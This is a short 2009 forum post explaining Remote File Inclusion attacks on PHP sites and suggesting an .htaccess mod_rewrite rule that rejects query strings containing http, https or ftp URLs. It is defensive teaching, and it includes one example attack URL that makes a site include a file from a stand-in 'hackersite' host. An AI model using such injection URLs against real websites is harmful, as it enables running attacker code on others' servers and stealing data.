Elven6
| Joined: Nov 2009 | | Posts: 10 | | Online Tag: Mehar | | Reputation: 0 [+ -] |
User is Offline |
 Posted: Nov 26, 2009 - 11:12 pm | |
A webmasters nightmare scenario getting hacked! One way a hacker is able to target your website is by using a Remote File Inclusion attack. Basically what this allows them to do is use security holes within your code to run external exploits. For example
[QUOTE]http://www.yoursite.com/index.php?option=http://hackersite/hackingfile.txt[/QUOTE]
By running this script they can take your server down delete files on your server or even steal information. Forutnetly their is a way to stop these attacks I won't say completely since nothing is ever 100% in programming (in this case they can encrypt the URL) but some assurance is better than none!
One way to solve the issue is using php scripts however
- They will only protect the file and not your server.
- It is taxing for your server to handle all those requests.
The alternative? We can use mod_rewrite to get the job done.
Open up your .htaccess file insert the following code in your file.
[QUOTE]RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)[/QUOTE]
This will allow the server to identify such requests being sent to your server. Directly underneath this insert the following line of code.
[QUOTE]RewriteRule ^(.+)$ - [F][/QUOTE]
There are various scripts that do essentially the same thing some might do it better than others. This specific script is courtesy of php Freaks.
If you have alternatives you use have questions comments etc feel free to post them below!
OneCMS: http://onecms.net
|
